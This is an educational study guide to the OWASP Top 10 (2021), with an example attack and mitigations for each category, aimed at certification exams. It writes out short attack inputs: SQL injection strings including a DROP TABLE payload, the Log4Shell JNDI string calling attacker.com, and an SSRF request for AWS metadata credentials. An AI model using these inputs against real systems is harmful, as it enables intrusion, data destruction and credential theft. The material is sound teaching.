Access control enforces that users can only act within their intended permissions. Broken access control means those restrictions aren't properly enforced — users can access other users' data, perform privileged actions, or reach resources they shouldn't. It moved to the #1 spot in 2021, found in 94% of tested applications. It covers everything from IDOR to missing function-level access control to CORS misconfiguration.
/api/users/1234/account. The application checks that the user is authenticated but doesn't verify they're requesting their own account. By simply changing 1234 to 1235, an attacker reads another user's account details. This is Insecure Direct Object Reference (IDOR) — one of the most common real-world vulnerabilities. Seen in countless data breach incidents involving health records, financial accounts, and personal data.
Formerly called "Sensitive Data Exposure," this category was renamed to focus on the root cause: failing to protect data with proper cryptography — or failing to use cryptography at all. This includes transmitting sensitive data in cleartext, using weak or outdated algorithms, improper key management, and not enforcing encryption in transit.
MD5 without salt. When the database is breached, attackers run the hashes through rainbow tables or precomputed lookup databases and recover most passwords within minutes. MD5 and SHA-1 are not password hashing algorithms — they're fast general-purpose hashes. An attacker can test billions of MD5 hashes per second on commodity hardware. The same applies to data at rest encrypted with weak keys, or session tokens transmitted over HTTP.
bcrypt, Argon2id, or scrypt with appropriate work factors. Never MD5 or SHA-1 for passwords.Strict-Transport-Security headers (HSTS).Cache-Control: no-store on pages containing sensitive data.Injection flaws occur when an application sends untrusted data to an interpreter as part of a command or query. The interpreter treats the attacker-supplied data as commands. SQL injection is the classic example, but injection covers NoSQL injection, OS command injection, LDAP injection, template injection, and more. Injection held the #1 spot for over a decade before being displaced by broken access control in 2021.
SELECT * FROM users WHERE username='[input]' AND password='[input]'. An attacker enters username ' OR '1'='1. The query becomes: SELECT * FROM users WHERE username='' OR '1'='1' AND password='' — which returns all users, logging the attacker in as the first user (often an admin). More destructively: '; DROP TABLE users; -- destroys the entire table. In 2021 alone, SQL injection was responsible for major breaches across finance, healthcare, and government targets.
DROP TABLE or admin permissions.A new category in 2021, insecure design focuses on flaws that exist by design — architectural decisions that create risk regardless of implementation quality. It's distinct from insecure implementation (where good design is poorly coded). Security must be considered in the design phase, not bolted on afterwards. No amount of secure coding fixes a fundamentally flawed design.
The most commonly seen issue in practice. Security misconfiguration includes default credentials left unchanged, unnecessary features enabled, overly permissive cloud storage, verbose error messages leaking stack traces, missing security headers, and unpatched systems. As infrastructure has moved to cloud and containers, the misconfiguration attack surface has expanded massively.
Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.Modern applications are mostly composed of third-party libraries, frameworks, and components. If any of those components have known vulnerabilities and aren't updated, the application inherits those vulnerabilities — regardless of how well the application code itself is written. The Log4Shell vulnerability (CVE-2021-44228) is the defining example: a single library used by thousands of products led to critical remote code execution exposure across the internet.
${jndi:ldap://attacker.com/exploit} in any user-supplied field (HTTP header, form field, username). Log4j processes the string, makes an outbound LDAP request, and fetches and executes attacker-controlled Java code — resulting in remote code execution. Affected products included VMware, Cisco, Apple iCloud, Amazon, Microsoft Azure. Patching took weeks across the industry.
npm audit, pip-audit, Dependabot, or Snyk to get automated alerts.Formerly "Broken Authentication," this category covers weaknesses in confirming who a user is. Weak passwords, credential stuffing vulnerabilities, missing MFA, broken session management, and improper session invalidation all fall here. Authentication is the gate — everything else depends on it working correctly.
A new 2021 category covering failures to protect against integrity violations in software updates, critical data, and CI/CD pipelines. This includes insecure deserialisation (the original A08 in 2017), using software from untrusted sources without integrity verification, and supply chain attacks where the build or update pipeline itself is compromised — as in the SolarWinds attack.
Without adequate logging and monitoring, breaches go undetected. The average time to detect a breach is still measured in months — often the attacker has full access long before anyone notices. This category covers insufficient logging of security events, failure to monitor logs, not alerting on anomalies, and log data that is too vague to be actionable in an investigation.
Server-Side Request Forgery (SSRF) is a new entry in 2021, added directly from community survey data due to increasing severity. It occurs when an application fetches a remote resource based on user-supplied input without properly validating the URL. An attacker can force the server to make requests to internal services, cloud metadata endpoints, or other sensitive infrastructure — effectively using the server as a proxy to access things the attacker can't reach directly.
/preview?url=https://example.com/image.jpg. An attacker replaces the URL with http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS instance metadata endpoint. The server fetches it and returns the IAM role credentials in the response. The attacker now has AWS access keys with whatever permissions the server's IAM role has. This exact attack has been used in real breaches including the 2019 Capital One breach (100 million records).
The Open Worldwide Application Security Project — a non-profit foundation that produces freely available security research, tools, and standards. The Top 10 is updated roughly every 3–4 years and is considered the baseline standard for web application security. It's referenced in PCI DSS, referenced in hiring requirements, and used as the foundation for DAST and SAST tool rule sets.
The Top 10 is not a comprehensive vulnerability list — it's a risk awareness document focused on the most broadly prevalent issues. It doesn't replace a full threat model or cover every vulnerability class. XSS, CSRF, and open redirect aren't standalone entries in 2021 (they fall under other categories). Use the Top 10 as a starting point, not a complete checklist.
The Top 10 maps directly to the OWASP Application Security Verification Standard (ASVS) which provides testable security requirements at three levels. For each entry here, there are corresponding ASVS controls that give you specific, implementable requirements rather than general guidance. ASVS Level 1 is a reasonable baseline for most web applications.
The OWASP Top 10 is directly tested in CompTIA Security+, CySA+, CASP+, CEH, and OSCP. For Security+ specifically, you'll need to know what each entry is, a real-world example, and the primary mitigation. The 2021 edition is now the current exam standard — make sure you know the new entries (A04 Insecure Design, A08 Software Integrity, A10 SSRF).